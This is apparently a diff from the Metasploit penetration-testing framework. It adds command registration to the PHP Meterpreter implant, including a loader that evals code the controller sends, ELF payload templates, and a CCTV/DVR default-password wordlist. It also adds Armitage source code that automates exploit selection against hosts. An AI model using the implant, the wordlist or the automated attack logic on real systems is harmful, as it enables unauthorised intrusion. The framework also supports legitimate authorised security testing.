 # to decide what options to send to ps for portability and for information
 # usefulness.
 if (!function_exists('stdapi_sys_process_get_processes')) {
+register_command('stdapi_sys_process_get_processes');
 function stdapi_sys_process_get_processes($req, &$pkt) {
     my_print("doing get_processes");
     $list = array();
@@ -702,6 +776,7 @@ function stdapi_sys_process_get_processes($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_sys_process_getpid')) {
+register_command('stdapi_sys_process_getpid');
 function stdapi_sys_process_getpid($req, &$pkt) {
     my_print("doing getpid");
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid()));
@@ -710,6 +785,7 @@ function stdapi_sys_process_getpid($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_sys_process_kill')) {
+register_command('stdapi_sys_process_kill');
 function stdapi_sys_process_kill($req, &$pkt) {
     # The existence of posix_kill is unlikely (it's a php compile-time option
     # that isn't enabled by default, but better to try it and avoid shelling
@@ -740,6 +816,7 @@ function stdapi_sys_process_kill($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_net_socket_tcp_shutdown')) {
+register_command('stdapi_net_socket_tcp_shutdown');
 function stdapi_net_socket_tcp_shutdown($req, &$pkt) {
     my_print("doing stdapi_net_socket_tcp_shutdown");
     $cid_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
@@ -780,6 +857,9 @@ function deregister_registry_key($id) {
 
 
 if (!function_exists('stdapi_registry_create_key')) {
+if (is_windows() and is_callable('reg_open_key')) {
+  register_command('stdapi_registry_create_key');
+}
 function stdapi_registry_create_key($req, &$pkt) {
     my_print("doing stdapi_registry_create_key");
     if (is_windows() and is_callable('reg_open_key')) {
@@ -813,6 +893,9 @@ function stdapi_registry_create_key($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_registry_close_key')) {
+if (is_windows() and is_callable('reg_open_key')) {
+    register_command('stdapi_registry_close_key');
+}
 function stdapi_registry_close_key($req, &$pkt) {
     if (is_windows() and is_callable('reg_open_key')) {
         global $registry_handles;
@@ -831,6 +914,9 @@ function stdapi_registry_close_key($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_registry_query_value')) {
+if (is_windows() and is_callable('reg_open_key')) {
+  register_command('stdapi_registry_query_value');
+}
 function stdapi_registry_query_value($req, &$pkt) {
     if (is_windows() and is_callable('reg_open_key')) {
         global $registry_handles;
@@ -868,6 +954,9 @@ function stdapi_registry_query_value($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_registry_set_value')) {
+if (is_windows() and is_callable('reg_open_key')) {
+    register_command('stdapi_registry_set_value');
+}
 function stdapi_registry_set_value($req, &$pkt) {
     if (is_windows() and is_callable('reg_open_key')) {
         global $registry_handles;

data/meterpreter/meterpreter.php

@@ -30,6 +30,18 @@ if (!isset($GLOBALS['readers'])) {
     $GLOBALS['readers'] = array();
 }
 
+# global list of extension commands
+if (!isset($GLOBALS['commands'])) {
+    $GLOBALS['commands'] = array("core_loadlib");
+}
+
+function register_command($c) {
+    global $commands;
+    if (! in_array($c, $commands)) {
+        array_push($commands, $c);
+    }
+}
+
 function my_print($str) {
     #error_log($str);
 }
@@ -389,14 +401,20 @@ function core_shutdown($req, &$pkt) {
 # isn't compressed before eval'ing it
 # TODO: check for zlib support and decompress if possible
 function core_loadlib($req, &$pkt) {
+    global $commands;
     my_print("doing core_loadlib");
     $data_tlv = packet_get_tlv($req, TLV_TYPE_DATA);
     if (($data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED) {
         return ERROR_FAILURE;
-    } else {
-        eval($data_tlv['value']);
-        return ERROR_SUCCESS;
     }
+    $tmp = $commands;
+    eval($data_tlv['value']);
+    $new = array_diff($commands, $tmp);
+    foreach ($new as $meth) {
+        packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, $meth));
+    }
+
+    return ERROR_SUCCESS;
 }
 
 

data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb

@@ -0,0 +1,21 @@
+class AddCounterCachesToHosts < ActiveRecord::Migration
+
+  def self.up
+    add_column :hosts, :note_count, :integer, :default => 0
+    add_column :hosts, :vuln_count, :integer, :default => 0
+    add_column :hosts, :service_count, :integer, :default => 0
+  
+    Mdm::Host.reset_column_information
+    Mdm::Host.all.each do |h|
+      Mdm::Host.reset_counters h.id, :notes
+      Mdm::Host.reset_counters h.id, :vulns
+      Mdm::Host.reset_counters h.id, :services
+    end
+  end
+
+  def self.down
+    remove_column :hosts, :note_count
+    remove_column :hosts, :vuln_count
+    remove_column :hosts, :service_count
+  end
+end

data/templates/src/elf/exe/elf_x86_bsd_template.s

@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_x86_template.s -f bin -o template_x86_linux.bin
+
+BITS 32
+
+org 0x08048000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 1, 1, 1, 9  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    3                        ;   e_machine
+  dd    1                        ;   e_version
+  dd    _start                   ;   e_entry
+  dd    phdr - $$                ;   e_phoff
+  dd    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    0                        ;   p_offset
+  dd    $$                       ;   p_vaddr
+  dd    $$                       ;   p_paddr
+  dd    0xDEADBEEF               ;   p_filesz
+  dd    0xDEADBEEF               ;   p_memsz
+  dd    7                        ;   p_flags      = rwx
+  dd    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+

data/templates/src/elf/exe/elf_x86_solaris_template.s

@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_x86_template.s -f bin -o template_x86_linux.bin
+
+BITS 32
+
+org 0x08048000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 1, 1, 1, 6  ;   e_ident
+  db    1, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    3                        ;   e_machine
+  dd    1                        ;   e_version
+  dd    _start                   ;   e_entry
+  dd    phdr - $$                ;   e_phoff
+  dd    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    0                        ;   p_offset
+  dd    $$                       ;   p_vaddr
+  dd    $$                       ;   p_paddr
+  dd    0xDEADBEEF               ;   p_filesz
+  dd    0xDEADBEEF               ;   p_memsz
+  dd    7                        ;   p_flags      = rwx
+  dd    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+

data/wordlists/multi_vendor_cctv_dvr_pass.txt

@@ -0,0 +1,66 @@
+1111
+1234
+2222
+3333
+4444
+5555
+6666
+7777
+8888
+9999
+0000
+4321
+3477
+5897
+12345
+12341
+123456
+1234567
+12345678
+12341234
+44444
+11111
+111111
+1111111
+11111111
+22222222
+33333333
+44444444
+55555555
+66666666
+77777777
+88888888
+99999999
+00000000
+0000000
+000000
+00000
+000
+00
+0
+09090
+7772000
+666666
+24343
+111
+123
+12
+11
+1
+2
+3
+4
+5
+6
+7
+8
+9
+0
+aa
+dvr2580222
+abc123
+pass
+password
+admin
+administrator
+root

data/wordlists/multi_vendor_cctv_dvr_users.txt

@@ -0,0 +1,2 @@
+admin
+user

external/source/armitage/build.xml

@@ -0,0 +1,42 @@
+<project name="armitage" default="all" basedir=".">
+	<property name="project.src"   location="src/" />
+	<property name="project.build" location="bin/" />
+
+	<target name="all" depends="init, compile, jar" />
+
+	<target name="init">
+		<tstamp />
+		<mkdir dir="${project.build}" />
+	</target>
+
+	<target name="compile" depends="init" description="compile the source " >
+		<javac srcdir="${project.src}/"
+			destdir="${project.build}"
+			nowarn="yes"
+			depend="yes"
+			debug="true"
+			optimize="yes"
+			includeantruntime="fuckno"
+		>
+		       <classpath path="./lib/jgraphx.jar;./lib/sleep.jar;./lib/msgpack-0.5.1-devel.jar;./lib/postgresql-9.1-901.jdbc4.jar" />
+		</javac>
+	</target>
+
+	<target name="jar" depends="compile">
+		<unzip src="lib/sleep.jar" dest="bin" />
+		<unzip src="lib/jgraphx.jar" dest="bin" />
+		<unzip src="lib/msgpack-0.5.1-devel.jar" dest="bin" />
+		<unzip src="lib/postgresql-9.1-901.jdbc4.jar" dest="bin" />
+		
+		<jar destfile="armitage.jar" basedir="bin" includes="**/*">
+			<manifest>
+				<attribute name="Main-Class" value="armitage.ArmitageMain" />
+			</manifest>
+		</jar>
+	</target>
+
+	<target name="clean" description="clean up" >
+		<delete dir="${project.build}"/>
+	</target>
+</project>
+

external/source/armitage/readme.txt

@@ -0,0 +1,90 @@
+=============================================================================
+Armitage - Cyber Attack Management for Metasploit
+=============================================================================
+   
+                 *** http://www.fastandeasyhacking.com ***
+
+1. What is Armitage?
+   -----------------
+
+Armitage is a graphical cyber attack management tool for Metasploit that 
+visualizes your targets, recommends exploits, and exposes the advanced 
+capabilities of the framework.
+
+Advanced users will find Armitage valuable for managing remote Metasploit 
+instances and collaboration. Armitage's red team collaboration features allow 
+your team to use the same sessions, share data, and communicate through one 
+Metasploit instance.
+
+Armitage aims to make Metasploit usable for security practitioners who 
+understand hacking but don't use Metasploit every day. If you want to learn 
+Metasploit and grow into the advanced features, Armitage can help you.
+
+2. Documentation
+   -------------
+
+The documentation for Armitage is located on the Armitage website at:
+http://www.fastandeasyhacking.com. Read the FAQ and the Manual for 
+information on connecting Armitage to Metasploit and using it.
+
+3. Install and Update
+   ----------
+
+To get started, see the manual at http://www.fastandeasyhacking.com
+
+4. Source Code
+   -----------
+
+This projected is hosted on Google Code at:
+http://code.google.com/p/armitage/
+
+5. Disclaimer
+   ----------
+
+Use this code for your development and don't hack systems that you don't 
+have permission to hack. The existence of this software does not reflect the 
+opinions or beliefs of my current employers, past employers, future 
+employers, or any small animals I come into contact with. Enjoy this 
+software with my blessing. I hope it helps you learn and become a better 
+security professional.
+
+6. Contact
+   -------
+
+Report bugs in the issue tracker at:
+http://code.google.com/p/armitage/issues/list
+
+E-mail contact@fastandeasyhacking.com with other questions/concerns. Make
+sure you peruse the FAQ and Manual first. 
+
+7. License
+   -------
+
+(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license. 
+See section 8 for more information.
+
+lib/jgraphx.jar is used here within the terms of the BSD license offered by
+JGraphX Ltd. http://www.jgraphx.com/
+-
+lib/msgpack-0.5.1-devel.jar and lib/postgresql-9.1-901.jdbc4.jar are both 
+BSD licensed libraries.
+-
+Some code in src/msf/* comes from msfgui by scriptjunkie. 
+-
+This project uses the LGPL Sleep scripting language with no modifications. 
+Sleep's source is available at: http://sleep.dashnine.org/
+
+8. The BSD License
+   ---------------
+
+Redistribution and use in source and binary forms are permitted provided 
+that the above copyright notice and this paragraph are duplicated in all 
+such forms and that any documentation, advertising materials, and other 
+materials related to such distribution and use acknowledge that the 
+software was developed by the copyright holders.  The name of the copyright
+holders  may not be used to endorse or promote products derived from this 
+software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED ''AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED 
+WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF 
+MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.

external/source/armitage/resources/about.html

@@ -0,0 +1,23 @@
+<html>
+	<body>	
+		<center><h1>Armitage 1.44-dev</h1></center>
+
+		<p>An attack management tool for Metasploit&reg;
+		<br />Release: 7 Jun 12</p>
+		<br />
+		<p>Developed by:</p>
+
+		<ul>
+			<li>Raphael Mudge (raffi)</li>
+		</ul>
+
+		<p>External code:</p>
+
+		<ul>
+			<li>MSF RPC code by scriptjunkie (BSD license)</li>
+			<li>JGraph by JGraph Ltd. (BSD license)</li>
+		</ul>
+
+		<p><small>Metasploit&reg; is a registered trademark of Rapid7</small></p>
+	</body>
+</html>

external/source/armitage/resources/armitage.prop

@@ -0,0 +1,58 @@
+#Armitage Configuration
+#Fri Oct 15 18:08:08 EDT 2010
+graph.font.font=Monospaced-BOLD-14
+console.clear_screen.shortcut=ctrl pressed K
+graph.zoom_out.shortcut=ctrl pressed MINUS
+graph.save_screenshot.shortcut=ctrl pressed P
+console.font_size_reset.shortcut=ctrl pressed 0
+console.page_down.shortcut=pressed PAGE_DOWN
+graph.arrange_icons_circle.shortcut=ctrl pressed C
+graph.selection.color=\#00ff00
+graph.zoom_in.shortcut=ctrl pressed EQUALS
+console.find.shortcut=ctrl pressed F
+console.history_previous.shortcut=pressed UP
+console.history_next.shortcut=pressed DOWN
+console.page_up.shortcut=pressed PAGE_UP
+console.highlight.color=\#0000cc
+console.font_size_plus.shortcut=ctrl pressed EQUALS
+console.font_size_minus.shortcut=ctrl pressed MINUS
+console.foreground.color=\#cccccc
+console.background.color=\#000000
+console.font.font=Monospaced-BOLD-14
+graph.arrange_icons_hierarchical.shortcut=ctrl pressed H
+graph.foreground.color=\#cccccc
+graph.background.color=\#111111
+graph.zoom_reset.shortcut=ctrl pressed 0
+console.clear_buffer.shortcut=pressed ESCAPE
+graph.edge.color=\#3c6318
+graph.arrange_icons_stack.shortcut=ctrl pressed S
+graph.edge_highlight.color=\#00ff00
+graph.default_layout.layout=stack
+application.skin.skin=Nimbus
+graph.clear_selection.shortcut=pressed ESCAPE
+graph.select_all.shortcut=ctrl pressed A
+armitage.required_exploit_rank.string=great
+armitage.string.target_view=graph
+console.select_all.shortcut=ctrl pressed A
+armitage.log_everything.boolean=true
+armitage.no_msf_banner.boolean=false
+tab.highlight.color=#0000ff
+armitage.show_all_commands.boolean=true
+armitage.application_title.string=Armitage
+console.color_0.color=\#ffffff
+console.color_1.color=\#000000
+console.color_2.color=\#3465A4
+console.color_3.color=\#4E9A06
+console.color_4.color=\#EF2929
+console.color_5.color=\#CC0000
+console.color_6.color=\#75507B
+console.color_7.color=\#C4A000
+console.color_8.color=\#FCE94F
+console.color_9.color=\#8AE234
+console.color_10.color=\#069A9A
+console.color_11.color=\#34E2E2
+console.color_12.color=\#729FCF
+console.color_13.color=\#AD7FA8
+console.color_14.color=\#808080
+console.color_15.color=\#c0c0c0
+console.show_colors.boolean=true

external/source/armitage/resources/error.txt

@@ -0,0 +1,12 @@
+Metasploit's RPC daemon shut down. This is the
+service Armitage uses to talk to Metasploit. 
+
+When this happens, it means something is wrong.
+The developer of Armitage feels your pain from
+afar. Would you like help troubleshooting this?
+
+P.S. yes you would--the answer is known and it's
+easy to deal with. Click Yes to visit the 
+troubleshooting guide at:
+
+http://www.fastandeasyhacking.com/nomsfrpcd

external/source/armitage/resources/eventlog.style

@@ -0,0 +1,4 @@
+^(..:..:..) \[\*\] (.*)				$1 \cC[*]\o $2
+^\[\*\] (.*)					\cC[*]\o $1
+^(..:..:..) \* (.*)				$1 \cD*\o $2
+^(\w+)>						\u$1\o>

external/source/armitage/resources/msfconsole.style

@@ -0,0 +1,11 @@
+^msf>				\umsf\u>
+^meterpreter >			\umeterpreter\u >
+^msf >				\umsf\u >
+^msf  (.*?)\((.*?)\) >		\umsf\u  $1(\c4$2\o) >
+^\[\*\] (.*)			\cC[*]\o $1
+^\[\+\] (.*)			\c9[+]\o $1
+^\[\-\] (.*)			\c4[-]\o $1
+^       =\[ (.*)		       =[\c7 $1
+^(=[=\s]+)			\cE$1
+^(\s*-[-\s]+)			\cE$1
+^(.*?): (.*)			$1\cE:\o $2

external/source/armitage/resources/msfrpcd.bat

@@ -0,0 +1,10 @@
+@echo off
+set BASE=$$BASE$$
+cd "%BASE%"
+set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%svn\bin;%BASE%nmap;%BASE%postgresql\bin;%PATH%
+IF NOT EXIST "%BASE%java" GOTO NO_JAVA
+set JAVA_HOME="%BASE%java"
+:NO_JAVA
+set MSF_DATABASE_CONFIG="%BASE%\config\database.yml"
+cd "%BASE%msf3"
+rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$

external/source/armitage/run.sh

@@ -0,0 +1 @@
+java -classpath bin:lib/\*:. armitage.ArmitageMain $*

external/source/armitage/scripts/armitage.sl

@@ -0,0 +1,319 @@
+debug(7 | 34);
+
+import javax.swing.*;
+import javax.swing.event.*;
+import javax.swing.border.*;
+import javax.imageio.*;
+
+import java.awt.*;
+import java.awt.event.*;
+
+import msf.*;
+import console.*;
+import armitage.*;
+import graph.*;
+
+import java.awt.image.*;
+
+global('$frame $tabs $menubar $msfrpc_handle $REMOTE');
+
+sub describeHost {
+	local('$sessions $os @overlay $ver $info');
+	($sessions, $os, $ver) = values($1, @('sessions', 'os_name', 'os_flavor'));
+
+	if (size($sessions) == 0) {
+		return $1['address'];
+	}
+
+	$info = values($sessions)[0]["info"];
+	if ("Microsoft Corp." isin $info) {
+		return $1['address'] . "\nshell session";
+	}
+	else {
+		return $1['address'] . "\n $+ $info";
+	}
+}
+
+sub showHost {
+	local('$sessions $os @overlay $match $purpose');
+	($sessions, $os, $match, $purpose) = values($1, @('sessions', 'os_name', 'os_flavor', 'purpose'));
+	$os = normalize($os);
+
+	if ($match eq "") {
+		$match = $1['os_match'];
+	}
+
+	if ($os eq "Printer" || "*Printer*" iswm $match || "*embedded*" iswm lc($os)) {
+		return overlay_images(@('resources/printer.png'));
+	}
+	else if ($os eq "Windows") {
+		if ("*2000*" iswm $match || "*95*" iswm $match || "*98*" iswm $match || "*ME*" iswm $match || "*Me*" iswm $match) {
+			push(@overlay, 'resources/windows2000.png');
+		}
+		else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) {
+			push(@overlay, 'resources/windowsxp.png');
+		}
+		else {
+			push(@overlay, 'resources/windows7.png');
+		}
+	}
+	else if ($os eq "Mac OS X" || "*apple*" iswm lc($os) || "*mac*os*x*" iswm lc($os)) {
+		push(@overlay, 'resources/macosx.png');
+	}
+	else if ("*linux*" iswm lc($os)) {
+		push(@overlay, 'resources/linux.png');
+	}
+	else if ($os eq "IOS" || "*cisco*" iswm lc($os)) {
+		push(@overlay, 'resources/cisco.png');
+	}
+	else if ("*BSD*" iswm $os) {
+		push(@overlay, 'resources/bsd.png');
+	}
+	else if ($os eq "Solaris") {
+		push(@overlay, 'resources/solaris.png');
+	}
+	else if ("*VMware*" iswm $os) {
+		push(@overlay, 'resources/vmware.png');
+	}
+	else if ($purpose eq "firewall") {
+		return overlay_images(@('resources/firewall.png'));
+	}
+	else {
+		push(@overlay, 'resources/unknown.png');
+	}
+
+	if (size($sessions) > 0) {
+		push(@overlay, 'resources/hacked.png'); 
+	}
+	else {
+		push(@overlay, 'resources/computer.png');
+	}
+
+	return overlay_images(@overlay);
+}
+
+sub connectToMetasploit {
+	local('$thread $5');
+	$thread = [new Thread: lambda(&_connectToMetasploit, \$1, \$2, \$3, \$4, \$5)];
+	[$thread start];
+}
+
+sub _connectToMetasploit {
+	global('$database $client $mclient $console @exploits @auxiliary @payloads @post');
+
+	# reset rejected fingerprints
+	let(&verify_server, %rejected => %());
+
+	# update preferences
+
+	local('%props $property $value $flag $exception');
+	%props['connect.host.string'] = $1;
+	%props['connect.port.string'] = $2;
+	%props['connect.user.string'] = $3;
+	%props['connect.pass.string'] = $4;
+
+	if ($5 is $null) {
+		foreach $property => $value (%props) {
+			[$preferences setProperty: $property, $value];
+		}
+	}
+	savePreferences();
+
+	# setup progress monitor
+	local('$progress');
+	$progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100];
+
+	# keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose.
+	$REMOTE = iff($1 eq "127.0.0.1", $null, 1);
+
+	$flag = 10;
+	while ($flag) {
+		try {
+			if ([$progress isCanceled]) {
+				if ($msfrpc_handle !is $null) {
+					try {
+						wait(fork({ closef($msfrpc_handle); }, \$msfrpc_handle), 5 * 1024);
+						$msfrpc_handle = $null;
+					}
+					catch $exception {
+						[JOptionPane showMessageDialog: $null, "Unable to shutdown MSFRPC programatically\nRestart Armitage and try again"];
+						[System exit: 0];
+					}
+				}
+				connectDialog();
+				return;
+			}
+
+			# connecting locally? go to Metasploit directly...
+			if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") {
+			        $client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug];
+				$mclient = $client;
+				initConsolePool();
+				initReporting();
+			}
+			# we have a team server... connect and authenticate to it.
+			else {
+				$client = c_client($1, $2);
+				setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
+				$mclient = setup_collaboration($3, $4, $1, $2);
+			}
+			$flag = $null;
+		}
+		catch $exception {
+			[$progress setNote: [$exception getMessage]];
+			[$progress setProgress: $flag];
+			$flag++;
+			sleep(2500);
+		}
+	}
+
+	let(&postSetup, \$progress);
+
+	[$progress setNote: "Connected: Getting base directory"];
+	[$progress setProgress: 30];
+
+	setupBaseDirectory();
+
+	if (!$REMOTE) {
+		[$progress setNote: "Connected: Connecting to database"];
+		[$progress setProgress: 40];
+
+		try {
+			# create a console to force the database to initialize
+			local('$c');
+			$c = createConsole($client);
+			call_async($client, "console.release", $c);
+
+			# connect to the database plz...
+			$database = connectToDatabase();
+			[$client setDatabase: $database];
+
+			# setup our reporting stuff (has to happen *after* base directory)
+			initReporting();
+		}
+		catch $exception {
+			[JOptionPane showMessageDialog: $null, "Could not connect to database.\nClick Help button for troubleshooting help.\n\n" . [$exception getMessage]];
+			if ($msfrpc_handle) { closef($msfrpc_handle); }
+			[System exit: 0];
+		}
+	}
+
+	[$progress setNote: "Connected: Getting local address"];
+	[$progress setProgress: 50];
+
+	cmd_safe("setg", lambda({
+		# store the current global vars to save several other calls later
+		global('%MSF_GLOBAL');
+		local('$value');
+	
+		foreach $value (parseTextTable($3, @("Name", "Value"))) {
+			%MSF_GLOBAL[$value['Name']] = $value['Value'];
+		}
+
+		# ok, now let's continue on with what we're doing...
+		getBindAddress();
+		[$progress setNote: "Connected: ..."];
+		[$progress setProgress: 60];
+
+		if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') {
+			showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server.");
+		}
+
+		dispatchEvent(&postSetup);
+	}, \$progress));
+}
+
+sub postSetup {
+	thread(lambda({
+		[$progress setNote: "Connected: Fetching exploits"];
+		[$progress setProgress: 70];
+
+		@exploits  = sorta(call($mclient, "module.exploits")["modules"]);
+
+		[$progress setNote: "Connected: Fetching auxiliary modules"];
+		[$progress setProgress: 80];
+
+		@auxiliary = sorta(call($mclient, "module.auxiliary")["modules"]);
+
+		[$progress setNote: "Connected: Fetching payloads"];
+		[$progress setProgress: 90];
+
+		@payloads  = sorta(call($mclient, "module.payloads")["modules"]);
+
+		[$progress setNote: "Connected: Fetching post modules"];
+		[$progress setProgress: 100];
+
+		@post      = sorta(call($mclient, "module.post")["modules"]);
+
+		[$progress close];
+		main();
+		createDashboard();
+	}, \$progress));
+}
+
+sub main {
+        local('$console $panel $dir');
+
+	$frame = [new ArmitageApplication];
+	[$frame setTitle: $TITLE];
+        [$frame setSize: 800, 600];
+
+	init_menus($frame);
+	initLogSystem();
+
+	[$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
+        [$frame show];
+	[$frame setExtendedState: [JFrame MAXIMIZED_BOTH]];
+
+	# this window listener is dead-lock waiting to happen. That's why we're adding it in a
+	# separate thread (Sleep threads don't share data/locks).
+	fork({
+		[$frame addWindowListener: {
+			if ($0 eq "windowClosing" && $msfrpc_handle !is $null) {
+				closef($msfrpc_handle);
+			}
+		}];
+	}, \$msfrpc_handle, \$frame);
+
+	dispatchEvent({
+		if ($client !is $mclient) {
+			createEventLogTab();
+		}
+		else {
+			createConsoleTab();
+		}
+	});
+
+	if (-exists "command.txt") {
+		deleteFile("command.txt");
+	}
+}
+
+sub checkDir {
+	# set the directory where everything exciting and fun will happen.
+	if (cwd() eq "/Applications" || !-canwrite cwd() || isWindows()) {
+		local('$dir');
+		$dir = getFileProper(systemProperties()["user.home"], "armitage-tmp");
+		if (!-exists $dir) {
+			mkdir($dir);
+		}
+		chdir($dir);
+		warn("Saving files to $dir");
+	}
+}
+
+setLookAndFeel();
+checkDir();
+
+if ($CLIENT_CONFIG !is $null && -exists $CLIENT_CONFIG) {
+	local('$config');
+	$config = [new Properties];
+	[$config load: [new java.io.FileInputStream: $CLIENT_CONFIG]];
+	connectToMetasploit([$config getProperty: "host", "127.0.0.1"], 
+				[$config getProperty: "port", "55553"],
+				[$config getProperty: "user", "msf"],
+				[$config getProperty: "pass", "test"], 1);
+}
+else {
+	connectDialog();
+}

external/source/armitage/scripts/attacks.sl

@@ -0,0 +1,652 @@
+#
+# Code to create the various attack menus based on db_autopwn
+#
+import java.awt.*;
+import java.awt.event.*;
+
+import javax.swing.*;
+import javax.swing.event.*;
+import javax.swing.table.*;
+
+import msf.*;
+import table.*;
+
+import ui.*;
+
+global('%results @always_reverse %exploits %results2');
+%results = ohash();
+%results2 = ohash();
+setMissPolicy(%results, { return @(); });
+setMissPolicy(%results2, { return @(); });
+
+# %exploits is populated in menus.sl when the client-side attacks menu is constructed
+
+# a list of exploits that should always use a reverse shell... this list needs to grow.
+@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php");
+
+#
+# generate menus for a given OS
+#
+sub exploit_menus {
+	local('%toplevel @allowed $ex $os $port $exploit');
+	%toplevel = ohash();
+	@allowed = getOS($1);
+
+	foreach $ex ($2) {
+		($os, $port, $exploit) = split('/', $ex);
+		if ($os in @allowed) {
+			if ($port !in %toplevel) {
+				%toplevel[$port] = %();
+			}
+			%toplevel[$port][$exploit] = $ex;
+		}
+	}
+
+	local('%r $menu $exploits $name $exploit');
+
+	%r = ohash();
+	putAll(%r, sorta(keys(%toplevel)), { return 1; });
+	foreach $menu => $exploits (%r) {
+		$exploits = ohash();
+		foreach $name (sorta(keys(%toplevel[$menu]))) {
+			$exploits[$name] = %toplevel[$menu][$name];
+		}
+	}
+
+	return %r;
+}
+
+sub targetsCombobox {
+	local('$key $value @targets $combobox');
+	foreach $key => $value ($1["targets"]) {
+		if (strlen($value) > 53) {
+			push(@targets, "$key => " . substr($value, 0, 50) . "...");
+		}
+		else {
+			push(@targets, "$key => $value");
+		}
+	}
+
+	$combobox = [new JComboBox: sort({
+		local('$a $b');
+		$a = int(split(' \=\> ', $1)[0]);
+		$b = int(split(' \=\> ', $2)[0]);
+		return $a <=> $b;
+	}, @targets)];
+
+	return $combobox;
+}
+
+sub getOS {
+	local('@allowed $os');
+	$os = normalize($1);
+
+	if ($os eq "Windows") { @allowed = @("windows", "multi"); }
+	else if ($os eq "Solaris") { @allowed = @("solaris", "multi", "unix"); }
+	else if ($os eq "Linux") { @allowed = @("linux", "multi", "unix"); }
+	else if ($os eq "Mac OS X") { @allowed = @("osx", "multi", "unix"); }
+	else if ($os eq "FreeBSD") { @allowed = @("freebsd", "multi", "unix"); }
+	else { @allowed = @("multi", "unix"); }
+	return @allowed;
+}
+
+# findAttacks("p", "good|great|excellent", &callback) - port analysis 
+# findAttacks("x", "good|great|excellent", &callback) - vulnerability analysis
+sub resolveAttacks {
+	thread(lambda(&_resolveAttacks, $args => @_));
+}
+
+sub _resolveAttacks {
+	# force a service data refresh before hail mary or find attacks.
+	_refreshServices(call($mclient, "db.services"));
+
+	%results = ohash();
+	%results2 = ohash();
+	setMissPolicy(%results, { return @(); });
+	setMissPolicy(%results2, { return @(); });
+
+	local('%r $r $p $module $s');
+	%r = ohash();
+	setMissPolicy(%r, { return @(); });
+
+	#
+	# find all exploits and their associated ports
+	#
+	
+	$s = rankScore($args[1]);
+	foreach $module (@exploits) {
+		if (%exploits[$module]["rankScore"] >= $s) { 
+			$r = call($client, "module.options", "exploit", $module);
+			yield 2;
+			if ("RPORT" in $r && "default" in $r["RPORT"]) {
+				$p = $r["RPORT"]["default"];
+				push(%r[$p], $module);
+
+				if ($p eq "445") {
+					push(%r["139"], $module);
+				}
+				else if ($p eq "139") {
+					push(%r["139"], $module);
+				}
+				else if ($p eq "80") {
+					push(%r["443"], $module);
+				}
+				else if ($p eq "443") {
+					push(%r["80"], $module);
+				}
+			}
+		}
+	}
+
+	#
+	# for each host, see if there is an exploit associated with its port and if so, report it...
+	#
+
+	local('$port $modules $host $data $services $exploit');
+
+	foreach $port => $modules (%r) {
+		foreach $host => $data (%hosts) {
+			$services = $data["services"];
+			if ($port in $services) {
+				foreach $exploit ($modules) {
+					push(%results[$host], $exploit);
+					push(%results2[$host], @($exploit, $port));
+				}
+			}
+		}
+	}
+
+	[$args[2]];
+}
+
+sub findAttacks {
+	resolveAttacks($1, $2, {
+		showError("Attack Analysis Complete...\n\nYou will now see an 'Attack' menu attached\nto each host in the Targets window.\n\nHappy hunting!");
+	});
+}
+
+sub smarter_autopwn {
+	local('$console');
+	elog("has given up and launched the hail mary!");
+
+	$console = createDisplayTab("Hail Mary", 1, $host => "all", $file => "hailmary");
+	[[$console getWindow] append: "\n\n1) Finding exploits (via local magic)\n\n"];
+
+	resolveAttacks($1, $2, lambda({
